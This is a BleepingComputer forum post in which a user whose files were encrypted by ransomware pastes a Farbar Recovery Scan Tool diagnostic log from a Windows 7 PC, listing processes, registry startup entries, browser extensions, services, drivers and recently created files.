Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

infected with Cryptolocker - all files are encrypted...


  • This topic is locked This topic is locked
18 replies to this topic

#1 sachyani

sachyani

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 24 June 2017 - 09:22 PM

Here are my log files:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 24-06-2017 01
Ran by Sachyani (administrator) on LANDBASE (24-06-2017 22:44:17)
Running from C:\Users\Sachyani\Downloads
Loaded Profiles: Sachyani (Available Profiles: Sachyani)
Platform: Microsoft Windows 7 Home Premium  Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Antivirus\sched.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(ZSMCSNAP) C:\Windows\ZSSnp211.exe
() C:\Windows\Domino.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Antivirus\avgnt.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\System Speedup\Avira.SystemSpeedup.UI.Systray.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Antivirus\avguard.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\VPN\Avira.VpnService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Antivirus\avscan.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Antivirus\avscan.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\SoftwareUpdater\Avira.SoftwareUpdater.ServiceHost.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(@ByELDI) C:\Program Files\KMSpico\Service_KMS.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\System Speedup\Avira.SystemSpeedup.SpeedupService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Launcher\Avira.ServiceHost.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Antivirus\avshadow.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\Launcher\Avira.Systray.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ZSSnp211] => C:\Windows\ZSSnp211.exe [57344 2007-04-06] (ZSMCSNAP)
HKLM\...\Run: [Domino] => C:\Windows\Domino.exe [49152 2006-08-18] ()
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [8546848 2010-03-26] (Realtek Semiconductor)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [267064 2017-05-09] (Apple Inc.)
HKLM\...\Run: [Avira SystrayStartTrigger] => C:\Program Files\Avira\Launcher\Avira.SystrayStartTrigger.exe [97512 2017-06-08] (Avira Operations GmbH & Co. KG)
HKLM\...\Run: [Avira System Speedup User Starter] => C:\Program Files\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [66656 2017-06-13] (Avira Operations GmbH & Co. KG)
HKLM\...\Run: [avgnt] => C:\Program Files\Avira\Antivirus\avgnt.exe [918008 2017-06-02] (Avira Operations GmbH & Co. KG)
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...\Run: [{C4B700E8-006B-9D20-AB99-2B0C8AECF8C0}] => C:\ProgramData\Microsoft\Performance\TheftProtection\temp\tmp37A2.exe <===== ATTENTION
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...\Run: [*kszo<*>] => "C:\Users\Sachyani\AppData\Local\752c\1cd2.bat" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...\Run: [27867b84] => C:\Users\Sachyani\AppData\Roaming\Microsoft\wxdsys.exe
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...409d6c4515e9\InprocServer32: [Default-shell32] C:\Users\Sachyani\AppData\Local\Ilsoft\mpqzunnc.dll ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 213.57.2.5 213.57.22.5
Tcpip\..\Interfaces\{9A6BF225-4E1A-437E-94A0-42674B6766C5}: [DhcpNameServer] 213.57.2.5 213.57.22.5
 
Internet Explorer:
==================
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-04-11] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2016-10-11] (Microsoft Corporation)
 
FireFox:
========
FF DefaultProfile: l6e3v380.default
FF ProfilePath: C:\Users\Sachyani\AppData\Roaming\Mozilla\Firefox\Profiles\l6e3v380.default [2017-06-24]
FF Extension: (Avira Browser Safety) - C:\Users\Sachyani\AppData\Roaming\Mozilla\Firefox\Profiles\l6e3v380.default\Extensions\abs@avira.com [2017-06-24]
FF Extension: (Avira Password Manager) - C:\Users\Sachyani\AppData\Roaming\Mozilla\Firefox\Profiles\l6e3v380.default\Extensions\passwordmanager@avira.com [2017-06-24]
FF Extension: (Avira SafeSearch Plus) - C:\Users\Sachyani\AppData\Roaming\Mozilla\Firefox\Profiles\l6e3v380.default\Extensions\safesearchplus2@avira.com [2017-06-24]
FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-12-13] (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin: @scout.avira-update.com/Avira Scout Update;version=3 -> C:\Program Files\Avira\Scout Update\1.3.32.7\npScoutUpdate3.dll [2017-06-24] (Avira Operations GmbH & Co. KG)
FF Plugin: @scout.avira-update.com/Avira Scout Update;version=9 -> C:\Program Files\Avira\Scout Update\1.3.32.7\npScoutUpdate3.dll [2017-06-24] (Avira Operations GmbH & Co. KG)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2016-12-13] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\itms.js [2017-05-09]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR DefaultSearchURL: Default -> hxxps://search.avira.com/#web/result?source=omnibar&q={searchTerms}
CHR DefaultSearchKeyword: Default -> Avira
CHR DefaultSuggestURL: Default -> hxxps://search.avira.com/suggestions?q={searchTerms}&li=ff&hl=en
CHR Profile: C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default [2017-06-24]
CHR Extension: (Google מצגות) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-02-18]
CHR Extension: (Google Docs) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-18]
CHR Extension: (כונן Google) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-18]
CHR Extension: (YouTube) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-18]
CHR Extension: (Avira Password Manager) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\caljgklbbfbcjjanaijlacgncafpegll [2017-06-24]
CHR Extension: (Adblock Plus) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-03-27]
CHR Extension: (Google Sheets) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-02-18]
CHR Extension: (Google Docs Offline) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-18]
CHR Extension: (Flash Control) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdgadgplbbdjlbjgdociahdlmbglfeen [2017-05-28]
CHR Extension: (Avira SafeSearch Plus) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\ipmkfpcnmccejididiaagpgchgjfajgp [2017-06-24]
CHR Extension: (Save to Facebook) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfikkaogpplgnfjmbjdpalkhclendgd [2017-03-15]
CHR Extension: (Local SWF Player) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdmbckedabpbgjagmkgcejooabcdnone [2017-02-25]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-12]
CHR Extension: (Gmail) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-02-18]
CHR Extension: (Chrome Media Router) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-06-02]
CHR HKLM\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ipmkfpcnmccejididiaagpgchgjfajgp] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 AntiVirMailService; C:\Program Files\Avira\Antivirus\avmailc7.exe [1128432 2017-06-02] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files\Avira\Antivirus\sched.exe [490968 2017-06-02] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files\Avira\Antivirus\avguard.exe [490968 2017-06-02] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files\Avira\Antivirus\avwebg7.exe [1524216 2017-06-02] (Avira Operations GmbH & Co. KG)
R2 Avira.ServiceHost; C:\Program Files\Avira\Launcher\Avira.ServiceHost.exe [356256 2017-06-08] (Avira Operations GmbH & Co. KG)
R2 AviraPhantomVPN; C:\Program Files\Avira\VPN\Avira.VpnService.exe [334064 2017-05-18] (Avira Operations GmbH & Co. KG)
R2 AviraUpdaterService; C:\Program Files\Avira\SoftwareUpdater\Avira.SoftwareUpdater.ServiceHost.exe [100816 2017-04-21] (Avira Operations GmbH & Co. KG)
S2 scupdate; C:\Program Files\Avira\Scout Update\ScoutUpdate.exe [116312 2017-06-24] (Avira Operations GmbH & Co. KG)
S3 scupdatem; C:\Program Files\Avira\Scout Update\ScoutUpdate.exe [116312 2017-06-24] (Avira Operations GmbH & Co. KG)
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [965776 2014-10-26] (@ByELDI) [File not signed]
R2 SpeedupService; C:\Program Files\Avira\System Speedup\Avira.SystemSpeedup.SpeedupService.exe [74800 2017-06-13] (Avira Operations GmbH & Co. KG)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R0 avdevprot; C:\Windows\System32\DRIVERS\avdevprot.sys [46440 2017-06-02] (Avira Operations GmbH & Co. KG)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [124232 2017-06-02] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [142712 2017-06-02] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [35840 2017-06-02] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\System32\DRIVERS\avnetflt.sys [59000 2017-06-02] (Avira Operations GmbH & Co. KG)
R0 avusbflt; C:\Windows\System32\Drivers\avusbflt.sys [23304 2017-06-02] (Avira Operations GmbH & Co. KG)
R3 vvftav211; C:\Windows\System32\drivers\vvftav211.sys [480128 2007-12-10] (Vimicro Corporation) [File not signed]
R3 ZSMC30x; C:\Windows\System32\Drivers\ZS211.sys [1472000 2007-12-13] (ZSMC.Corporation) [File not signed]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-06-24 22:44 - 2017-06-24 22:47 - 00014081 _____ C:\Users\Sachyani\Downloads\FRST.txt
2017-06-24 22:43 - 2017-06-24 22:44 - 00000000 ____D C:\FRST
2017-06-24 22:42 - 2017-06-24 22:42 - 01779712 _____ (Farbar) C:\Users\Sachyani\Downloads\FRST.exe
2017-06-24 22:23 - 2017-06-24 22:23 - 00000000 ____D C:\Users\Sachyani\Desktop\OrganiZen
2017-06-24 22:18 - 2017-06-24 22:27 - 00000000 ____D C:\Program Files\Mozilla Firefox
2017-06-24 22:06 - 2017-06-24 22:06 - 02563616 _____ (Kaspersky Lab) C:\Users\Sachyani\Downloads\kis17.0.0.611aben_de_es_nl_it_fr_11638.exe
2017-06-24 21:38 - 2017-06-24 21:38 - 01340848 _____ (Emsisoft Ltd) C:\Users\Sachyani\Downloads\decrypt_pclock2.exe
2017-06-24 21:33 - 2017-06-24 22:08 - 00000000 ____D C:\ProgramData\ParetoLogic
2017-06-24 21:33 - 2017-06-24 21:33 - 00000000 ____D C:\Program Files\ParetoLogic
2017-06-24 21:31 - 2017-06-24 21:31 - 02936752 _____ (ParetoLogic) C:\Users\Sachyani\Downloads\Pareto_DR_Setup_RW.exe
2017-06-24 00:21 - 2017-06-24 00:21 - 00000000 ____D C:\Users\Sachyani\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Avira
2017-06-24 00:12 - 2017-06-24 00:12 - 00000000 ____D C:\Users\Sachyani\AppData\Roaming\Avira
2017-06-24 00:10 - 2017-06-24 00:10 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_avusbflt_01011.Wdf
2017-06-24 00:09 - 2017-06-02 19:05 - 00142712 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2017-06-24 00:09 - 2017-06-02 19:05 - 00124232 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2017-06-24 00:09 - 2017-06-02 19:05 - 00059000 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2017-06-24 00:09 - 2017-06-02 19:05 - 00046440 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avdevprot.sys
2017-06-24 00:09 - 2017-06-02 19:05 - 00035840 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avkmgr.sys
2017-06-24 00:09 - 2017-06-02 19:05 - 00023304 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avusbflt.sys
2017-06-24 00:07 - 2017-06-24 00:07 - 00002094 _____ C:\Users\Public\Desktop\Avira Scout.lnk
2017-06-24 00:05 - 2017-06-24 00:21 - 00000000 ____D C:\Users\Sachyani\AppData\Local\Avira
2017-06-24 00:04 - 2017-06-24 00:37 - 00000000 ____D C:\Users\Public\Speedup Sessions
2017-06-24 00:04 - 2017-06-24 00:04 - 00000998 _____ C:\Users\Public\Desktop\Avira Phantom VPN.lnk
2017-06-24 00:03 - 2017-06-24 00:03 - 00002036 _____ C:\Users\Public\Desktop\Avira Software Updater.lnk
2017-06-24 00:02 - 2017-06-24 00:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2017-06-24 00:02 - 2017-06-24 00:09 - 00000000 ____D C:\ProgramData\Avira
2017-06-24 00:02 - 2017-06-24 00:09 - 00000000 ____D C:\Program Files\Avira
2017-06-24 00:02 - 2017-06-24 00:02 - 00001166 _____ C:\Users\Public\Desktop\Avira Connect.lnk
2017-06-24 00:02 - 2017-06-24 00:02 - 00000000 ____D C:\ProgramData\Package Cache
2017-06-24 00:01 - 2017-06-24 00:01 - 04799712 _____ (Avira Operations GmbH & Co. KG) C:\Users\Sachyani\Downloads\avira_en_fass0_594d81a9523e4__ws.exe
2017-06-20 14:56 - 2017-06-20 14:56 - 15791980 _____ C:\Users\Sachyani\cl_data_1Ew9VF9CUNyRYEBU3A33eq37iB5RYSESHk.bak
2017-06-18 21:56 - 2017-06-18 21:56 - 00153711 _____ C:\Users\Sachyani\Downloads\לא מאושר 436394.crdownload
2017-06-14 23:07 - 2017-06-02 11:09 - 01549824 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 01400320 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 00666624 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 00104448 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 00059392 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2017-06-14 23:07 - 2017-06-02 11:09 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2017-06-14 23:07 - 2017-06-02 10:58 - 00427520 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2017-06-14 23:07 - 2017-06-02 10:58 - 00164352 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2017-06-14 23:07 - 2017-06-02 10:57 - 00497152 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-06-14 23:07 - 2017-06-02 10:57 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2017-06-14 23:07 - 2017-06-02 10:57 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\msshooks.dll
2017-06-14 23:07 - 2017-05-21 07:10 - 00137960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-06-14 23:07 - 2017-05-21 07:10 - 00067304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-06-14 23:07 - 2017-05-21 07:06 - 01062912 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00655360 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00553472 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00261120 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00254464 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00172032 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-06-14 23:07 - 2017-05-21 07:06 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-06-14 23:07 - 2017-05-21 06:46 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-06-14 23:07 - 2017-05-21 06:43 - 00226304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-06-14 23:07 - 2017-05-21 06:42 - 00124416 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-06-14 23:07 - 2017-05-21 06:42 - 00098304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-06-14 23:07 - 2017-05-21 06:42 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-06-14 23:07 - 2017-05-21 06:42 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-06-14 23:07 - 2017-05-21 06:42 - 00015872 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-06-14 23:07 - 2017-05-16 20:35 - 00346320 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-06-14 23:07 - 2017-05-14 22:37 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-06-14 23:07 - 2017-05-14 22:37 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-06-14 23:07 - 2017-05-14 22:23 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-06-14 23:07 - 2017-05-14 22:22 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-06-14 23:07 - 2017-05-14 22:22 - 00341504 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-06-14 23:07 - 2017-05-14 22:22 - 00047616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-06-14 23:07 - 2017-05-14 22:21 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-06-14 23:07 - 2017-05-14 22:16 - 02290176 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-06-14 23:07 - 2017-05-14 22:15 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-06-14 23:07 - 2017-05-14 22:14 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-06-14 23:07 - 2017-05-14 22:12 - 00476160 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-06-14 23:07 - 2017-05-14 22:11 - 20274688 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-06-14 23:07 - 2017-05-14 22:11 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-06-14 23:07 - 2017-05-14 22:11 - 00104960 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-06-14 23:07 - 2017-05-14 22:10 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-06-14 23:07 - 2017-05-14 22:10 - 00620032 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-06-14 23:07 - 2017-05-14 22:05 - 00667648 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-06-14 23:07 - 2017-05-14 22:02 - 00416256 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-06-14 23:07 - 2017-05-14 21:57 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-06-14 23:07 - 2017-05-14 21:57 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-06-14 23:07 - 2017-05-14 21:56 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-06-14 23:07 - 2017-05-14 21:53 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-06-14 23:07 - 2017-05-14 21:52 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-06-14 23:07 - 2017-05-14 21:50 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-06-14 23:07 - 2017-05-14 21:49 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-06-14 23:07 - 2017-05-14 21:44 - 04549120 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-06-14 23:07 - 2017-05-14 21:42 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-06-14 23:07 - 2017-05-14 21:40 - 00693248 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-06-14 23:07 - 2017-05-14 21:40 - 00689664 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-06-14 23:07 - 2017-05-14 21:39 - 02057216 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-06-14 23:07 - 2017-05-14 21:38 - 01155072 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-06-14 23:07 - 2017-05-14 21:30 - 13664768 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-06-14 23:07 - 2017-05-14 21:15 - 02767872 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-06-14 23:07 - 2017-05-14 21:11 - 01314816 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-06-14 23:07 - 2017-05-14 21:11 - 00710144 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-06-14 23:07 - 2017-05-12 21:07 - 04001000 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2017-06-14 23:07 - 2017-05-12 21:07 - 03945704 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-06-14 23:07 - 2017-05-12 21:07 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2017-06-14 23:07 - 2017-05-12 21:04 - 01310528 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00644096 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
